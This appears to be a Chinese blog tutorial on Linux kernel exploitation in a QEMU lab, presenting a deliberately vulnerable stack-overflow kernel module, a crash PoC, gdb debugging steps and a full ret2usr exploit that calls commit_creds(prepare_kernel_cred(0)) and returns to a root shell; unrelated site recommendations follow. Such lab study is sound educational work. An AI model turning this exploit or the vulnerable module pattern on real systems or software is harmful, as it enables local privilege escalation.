linux内核漏洞利用初探(3):demo-stack_overflow

最新推荐文章于 2024-01-13 11:27:47 发布
最新推荐文章于 2024-01-13 11:27:47 发布
阅读量772 收藏 1
点赞数
分类专栏: 内核漏洞 文章标签: 内核漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/panhewu9919/article/details/99485487
版权

2. Kernel Stack Overflow

(1)漏洞代码
#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/proc_fs.h>
int bug2_write(struct file *file,const char *buf,unsigned long len)
{
    char localbuf[8];
    memcpy(localbuf,buf,len);
    return len;
}
static int __init stack_smashing_init(void)
{
    printk(KERN_ALERT "stack_smashing driver init!n");
    create_proc_entry("bug2",0666,0)->write_proc = bug2_write;
    return 0;
}
static void __exit stack_smashing_exit(void)
{
    printk(KERN_ALERT "stack_smashing driver exit!n");
}
module_init(stack_smashing_init);
module_exit(stack_smashing_exit);

简单的栈溢出漏洞。

# Makefile
obj-m := stack_smashing.o  
KERNELDR := ~/linux_kernel/linux-2.6.32.1/linux-2.6.32.1/
PWD := $(shell pwd)  
modules:  
	$(MAKE) -C $(KERNELDR) M=$(PWD) modules  
moduels_install:  
	$(MAKE) -C $(KERNELDR) M=$(PWD) modules_install  
clean:  
	rm -rf *.o *~ core .depend .*.cmd *.ko *.mod.c .tmp_versions
(2)PoC
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <fcntl.h>
int main(){
    char buf[24] = {0};
    memset(buf,"A",24);
    *((void**)(buf + 20)) = 0x42424242;
    int fd = open("/proc/bug2",O_WRONLY);
    write(fd,buf,sizeof(buf));
}

$ insmod ./stack_smashing.ko

在这里插入图片描述

QEMU起内核后运行poc_stack直接崩溃,为了简便,需关闭cannary选项,重新编译内核。

编辑.config文件,注释掉CONFIG_CC_STACKPROTECTOR这一行,然后重新编译内核,再重新编译stack_smashing.ko(程序之前编译时是支持canary的,checksec查看即可)。

再跑POC。

$ insmod ./stack_smashing.ko

在这里插入图片描述
发现RIP被劫持为0x4242424242424242。

#start_stack_smashing.sh
qemu-system-x86_64 \
      -m 256M      \
      -kernel linux-2.6.32.1/arch/x86/boot/bzImage \
      -initrd ./rootfs_stack_smashing.img  \
      -append "root=/dev/ram rdinit=/sbin/init" \
      -s
#QEMU命令
$ cat /sys/module/stack_smashing/sections/.texts
0xffffffffa0000000
#gdb调试命令 (可以用gdb脚本更方便)
$ gdb vmlinux
$ target remote :1234
$ add-symbol-file ./stack_smashing.ko 0xffffffffa0000000
$ b bug2_write
$ c
#gdb.sh脚本
gdb \
    -ex "add-auto-load-safe-path $(pwd)" \
    -ex "file ../../linux-2.6.32.1/vmlinux" \   
    -ex 'target remote localhost:1234' \
    -ex 'add-symbol-file ./stack_smashing.ko 0xffffffffa0000000' \
    -ex 'b bug2_write' \
    -ex 'c'
$ x /20iw $pc
$ b *0xffffffffa0000022   # ret处下断
$ c
$ ni
Warning: not running or target is remote
0x4242424242424242 in ?? ()
(3)exploit

1.思路

利用commit_creds(prepare_kernel_cred(0)),然后返回到用户模式先执行swapgs,再执行iret。

当使用IRET指令返回到相同保护级别的任务时,IRET会从堆栈弹出代码段选择子及指令指针分别到CS与IP寄存器,并弹出标志寄存器内容到EFLAGS寄存器,还会弹出堆栈段选择子及堆栈指针分别到SS与SP寄存器。

struct trap_frame 
{
    void* eip;                // instruction pointer +0
    uint32_t cs;            // code segment    +4
    uint32_t eflags;        // CPU flags       +8
    void* esp;                // stack pointer       +12
    uint32_t ss;            // stack segment   +16
} __attribute__((packed));

2.编写exploit

//gcc exp.c -static -masm=intel -g -o exp_stack
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>


size_t user_rip;
size_t user_cs;
size_t user_rflags;
size_t user_sp;
size_t user_ss;

struct trap_frame{
    size_t user_rip;
    size_t user_cs;
    size_t user_rflags;
    size_t user_sp;
    size_t user_ss;
}__attribute__((packed));
struct trap_frame tf;

size_t addr=&tf;  //user_rip

void get_shell(void){
    system("/bin/sh");
}

void save_status()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    tf.user_rip = &get_shell;
    tf.user_cs  = user_cs;
    tf.user_rflags = user_rflags;
    tf.user_sp  = user_sp-0x1000;    //why?
    tf.user_ss  = user_ss;
    puts("[*]status has been saved.");
}

#define KERNCALL __attribute__((regparm(3)));

size_t prepare_kernel_cred=0xffffffff81083330;  //How to find this address?
size_t commit_creds=0xffffffff81083140;
void payload(void){
    //payload here    
    char* (*pkc)(int)=prepare_kernel_cred;
    void (*cc)(char*)=commit_creds;
    (*cc)((*pkc)(0));
    asm(
    	"swapgs;"    //exchange GS
    	"mov rsp, addr;"
       "iretq;");
}

int main(void){
    char buf[48];
    memset(buf,0x41,48);
    *((void**)(buf+32)) = &payload; //set rip to payload
    save_status();
    //write(1,buf,sizeof(buf));
    int fd = open("/proc/bug2",O_WRONLY);
    //exploit
    write(fd,buf,sizeof(buf));
    return 0;
}

调试:

#gdb
$ ./gdb.sh
$ x /20iw $pc
$ b *0xffffffffa0000022   #ret处下断点
$ c
$ stack

由于muhe的教程是32位的,在64位系统上测试时需要修改exp,主要有以下几点:

  • asm内联汇编:iret -> iretq 。
  • 32位居然不需要"swapgs"来切换 GS 段寄存器。
  • cat /proc/kallsyms 找提权函数地址

在这里插入图片描述

参考:

https://www.anquanke.com/post/id/85837
https://www.anquanke.com/post/id/85840
https://www.anquanke.com/post/id/85848

bsauce
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Z-Stack 3.0.2-.7z.zip_Z-STACK 3.0.2_Z-STACK-3.0.2_z-stack 3_z-st
07-15
Z-Stack 3.0.2 是一个专为物联网(IoT)设计的网络协议栈,它由Zigbee联盟开发并广泛应用于智能家居、智能能源、工业自动化等领域。Zigbee是一种低功耗、低成本、自组织的无线通信技术,支持多跳网络,能构建大规模...
LeetCode报错:AddressSanitizer:DEADLYSIGNAL详细分析与解决
热门推荐
来知晓的博客
07-05 5万+
LeetCode报错:AddressSanitizer:DEADLYSIGNAL详细分析与解决问题描述问题分析实例分析 更多总结见:C刷题:LeetCode刷题踩坑常见BUG总结 问题描述 报错:AddressSanitizer:DEADLYSIGNAL,详细如下 ===42====ERROR:AddressSanitizer: SEGV on unknown address xx. The signal is caused by a READ memory access. 问题分析 一般可能主要有
【C语言刷LeetCode】Address Sanitizer 常见报错
kinbo88的专栏
03-01 1万+
LeetCode使用 AddressSanitizer 检查内存是否存在非法访问,报此错,主要是访问了非法内容。 Address Sanitizer(ASan)是google开发一个快速的内存错误检测工具,性能据说比valgrind要好不少,可以配合clang或者GCC编译器使用,GCC需要4.8及以上版本。 详细了解AddressSanitizer信息可以访问其github项目地址:http...
简单的栈溢出_hello_elf
Hvnt3r的博客
03-06 571
简单的栈溢出_hello_elf 原文地址:https://hvnt3r.top/2018/09/%E7%AE%80%E5%8D%95%E7%9A%84%E6%A0%88%E6%BA%A2%E5%87%BA-hello-elf/ 最近哥们问了我一道PWN题,觉得比较有代表性而且难度较低,就记录下来以作栈溢出的示例,仅从新手角度分析,大牛绕过 题目地址:https://pan.baidu.com/s...
Kernel Stack Overflow(转)
weixin_30262255的博客
09-04 718
0x00漏洞代码 stack_smashing.c #include <linux/init.h> #include <linux/module.h> #include <linux/kernel.h> #include <linux/proc_fs.h> int bug2_write(struct file *file,const...
LeetCode “AddressSanitizer: heap-buffer-overflow on address ...“ 报错解决
weixin_42989041的博客
12-30 2555
问题 我们在刷LeetCode时,往往会出现这种报错信息: AddressSanitizer: heap-buffer-overflow on address 0x602000000040 at pc 0x000000406b5e bp 0x7ffc15cc0320 sp 0x7ffc15cc0318 分析 看到Address, overflow,往往是地址访问越界的错误。因此,遇到这个报错信息,说明数组的下标访问越界。 解决 既然数组下标访问越界,则需要检查代码中与数组下标有关的判断语句、赋值语句或循
Udacity-Full_Stack:Udacity-Full_Stack
03-10
Udacity-Full_Stack Udacity-Full_Stack 全栈基础 通过Amazon Web Services 使用Python构建数据驱动的Web应用 在本课程中,您将学习后端Web开发的基础知识! 您将创建自己的Web应用程序,该应用程序在数据库中...
Ti_Z-Stack_Linux_gateway:适用于MT7628的TI Zigbee Z-stack Linux网关
05-11
`Ti_Z-Stack_Linux_gateway` 是一个专为MT7628处理器设计的Zigbee Z-stackLinux平台上的网关实现。Zigbee Z-stack是由德州仪器(TI)开发的一种网络协议栈,它允许设备通过Zigbee网络进行通信,尤其适合物联网(IoT)...
usof--Stack_Overflow_clone:堆栈溢出克隆-挑战为专业和发烧级程序员的未来问答服务创建API
03-18
标题中的“usof--Stack_Overflow_clone”是一个项目名,显然它是对知名编程问答网站Stack Overflow的一个克隆版本。这个项目旨在为专业和资深程序员提供一个类似的服务,但可能具有不同的特性和功能,或者是为了学习...
leetcodepushfront-stack_w_2_queues:stack_w_2_queues
07-07
推前stack_w_2_queues 力码 编队 /* Q. Implement the following operations of a stack using queues: - push(x): Push element x onto stack. - pop(): Removes the element on top of the stack. - top(): Get ...
Linux内核漏洞浅析
03-04
拒绝服务攻击是目前比较流行的攻击方式,它并不取得服务器权限,而是使服务器崩溃或失去响应。对Linux的拒绝服务大多数都无须登录即可对系统发起拒绝 服务攻击,使系统或相关的应用程序崩溃或失去响应能力,这种方式属于利用系统本身漏洞或其守护进程缺陷及不正确设置进行攻击。由于tcp/ip本身的缺陷,导致很多操作系统都存在tcp/ip堆栈漏洞,使攻击者进行ip地址欺骗非常容易实现。Linux也不例外。虽然IP地址欺骗不会对Linux服务器本身造成很严重的影响,但是对很多利用Linux为操作系统的防火墙和IDS产品来说,这个漏洞却是致命的。
leetcode报错之 ERROR: AddressSanitizer: stack-overflow on address ...
AuthurLEE's Blogs
04-12 1万+
ERROR: AddressSanitizer: stack-overflow on address...原因,解决方案以及解决方案的相关资料
Leetcode 常见报错原因之 heap-buffer-overflow on address 和 reference binding to misaligned address
qq_39220334的博客
01-19 2万+
1. SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior 对数组进行操作时,一定要注意数组的可索引范围,保证数组不发生越界。在 Leetcode 中数组越界会给出如下几种报错信息: 1. AddressSanitizer: heap-buffer-overflow on address 报错信息: ==42==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60300000032
LeetCode27.移动元素 报错:==42==ERROR: AddressSanitizer: heap-buffer-overflow on address解决
qq_44684877的博客
01-21 1万+
LeetCode 27.移动元素 给你一个数组 nums 和一个值 val,你需要 原地 移除所有数值等于 val 的元素,并返回移除后数组的新长度。 不要使用额外的数组空间,你必须仅使用 O(1) 额外空间并 原地 修改输入数组。 元素的顺序可以改变。你不需要考虑数组中超出新长度后面的元素。 来源:力扣(LeetCode) 链接:https://leetcode-cn.com/problems/remove-element 实现代码: class Solution { public: int re
Linux内核之堆溢出的利用
蚁景网安学院
09-13 432
用户进程会通过malloc等函数进行动态内存分配相应的内核也有一套动态的内存分配机制。该项目在执行read模块时会从内核堆地址中拷贝信息到用户空间中去,但是这里的拷贝没有对长度做限制,因此存在着越界读的漏洞
Linux Kernel Stack Overflow/Linux 内核栈溢出
最新发布
lenky0401的专栏
01-13 1597
Linux内核会分配一页(4K stack)或两页连续(8K stack)不可交换(non-swappable)内存来作为内核栈使用。可以看到,一个地方(kernel_stack_init函数)的栈占去$0x400(有几个局部变量是直接使用的寄存器,所以才没有消耗栈),而另外一个地方(just_copy_half函数)的栈占去%rax是个不定值,这就需要继续看对应的汇编来进行分析(因为数组是动态数组),这只是个示例,如果在真实内核代码中有这样的函数,那是相当危险的。,好吧,继续8K内核栈。
C++ 问题处理:(Leetcode) ==42==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000118
道纪书生的博客
08-04 1万+
今天刷Leetcode时,代码在本地编译器(VS Code+Gcc)上完美运行,但在Leetcode提交时报错: 错误原因是: ==42==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000118 意思是堆缓冲区发生了溢出,但仔细检查了代码,好像也没发现啥问题,何况测试用例输入到本地编译器里都能运行,百思不得其解。代码如下: #include<bits/stdc++.h> using name
leetcode报错:AddressSanitizer:DEADLYSIGNAL
qq_35102059的博客
03-08 4117
leetcode报错: AddressSanitizer:DEADLYSIGNAL ================================================================= ==43==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x00000034ca17 bp 0x7ffe82f08070 sp 0x7ffe82f07f40 T0) ==43==The signal is caused by a R
内核漏洞利用】TokyoWesternsCTF-2019-gnote Double-Fetch
panhewu9919的博客
09-16 1678
一、CVE-2015-8550 漏洞详情可以参见https://wpengfei.github.io/cpedoc-accepted.pdf。 [外链图片转存失败(img-tzpkzvE3-1568621850784)(/Users/john/Desktop/tmp/2019ctf/TokyoWesternsCTF/gnote/writeup/CVE-2015-8550.png)] gcc 编译s...
warning: Cannot use CONFIG_STACK_VALIDATION=y, please install libelf-dev, libelf-devel or elfutils-libelf-devel error: Cannot resolve BTF IDs for CONFIG_DEBUG_INFO_BTF, please install libelf-dev, libelf-devel or elfutils-libelf-devel make: *** [Makefile:1236:prepare-resolve_btfids] 错误 1
05-12
这个错误提示是在编译内核时出现的,缺少了 libelf 相关的库文件。你可以尝试执行以下命令安装相关的库文件: 1. Debian/Ubuntu ```bash sudo apt-get install libelf-dev ``` 2. Red Hat/CentOS/Fedora ```bash...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值